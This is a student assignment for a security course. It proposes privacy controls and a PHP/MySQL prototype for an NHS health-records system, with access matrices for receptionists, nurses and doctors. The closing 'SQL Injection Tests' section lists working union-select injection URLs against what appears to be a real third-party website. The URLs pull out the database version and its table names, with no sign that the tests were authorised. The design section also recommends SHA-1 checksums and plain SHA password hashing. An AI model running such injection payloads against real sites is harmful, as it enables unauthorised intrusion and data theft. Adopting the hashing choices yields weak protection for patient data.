ISC6120 ADVANCED INFORMATION SYSTEMS SECURITY

The National Health Service (NHS) has given the green light for hospitals and social care
agencies to move healthcare data to the public cloud. The most critical issues in implementing
the HIS is a security issue, because the type of the data that stores and process in the HIS related
to the patient healthcare data and this type of the data are so sensitive and valuable. Therefore,
the security of data in HIS is very important.

a) Provide a holistic solution for privacy of sensitive data and usability of e-health systems.

Key focus on the privacy: Confidentiality, Integrity, Availability

Confidentiality – Ensuring only authorized users can view and access the specified level of
information. Model coverage uses the Bell-Lapadula model where Read-Up and Write-Down is
restricted. Access control is by the use of usernames and password accounts locked to a specific
domain.

Integrity – Focus is on the accuracy and trustworthiness of user data. This prevents modification
of data at rest and in transit. File permissions is to be enhanced per user. Cryptography checksum
of SHA-1 is to be used.

Availability – the system focus is on the hardware and cloud hosting support, to ensure the
system is well functioning when required. DRP plans need to be in place to ensure events such as
natural disasters, communication system breakdown and host system hardware failure does not
impact on the system and users. This is to be achieved by used of active-active replication hosts.

b) Develop a prototype application using php mysql to store patient medical. The application
can be entered using a username and password for different type of users. Encrypt Sensitive
data in the database using AES and the password should be hashed using SHA.
Attached is the Database code. The addemp folder was created inside xampp>htdocs.

addemp.zip hospital_sqlcode.txt hospital_database.sql

Form before inserting data

DB before inserting data from the HTML form

Data entry into HTML form

Reflection of newly entered record in the Xampp DB

Enrypting data using AES

Encrypted Prescriptions #4 & 6

Viewing encrypted entries
c) The application should allow authenticated users to retrieve encrypted data based on their
level of privileges
Receptionist’s Access matrix:
1. Employee: all functions

2. Patient records: all functions except selecting, inserting, updating and referencing
blood_group and ailment.
 3. Prescription: no access

Nurse’s Access matrix:

1. Patient_records: select all; insert and update (only blood_group and ailment).

2. Prescription: all except inserting and updating patient_id details.

 3. Employee: No access

Doctor’s Access matrix:

1. Prescription: all functions.

2. Patient_records: select all; insert, update and reference (only ailment).

 3. Employee: No access

SQL Injection Tests:

Website used: http://www.asfaa.org

Search: http://www.asfaa.org/members.php?id=-1
To display core tables:

http://www.asfaa.org/members.php?id=-1%20union%20select%201,2,3,4--+

Using table 2 as the main table, use union select. This displays the php version:

http://www.asfaa.org/members.php?id=-1 union select 1,@@version,3,4--+

To display the tables:

http://www.asfaa.org/members.php?id=-1 union select 1,group_concat(table_name),3,4 from

information_schema.tables where table_schema=database()--+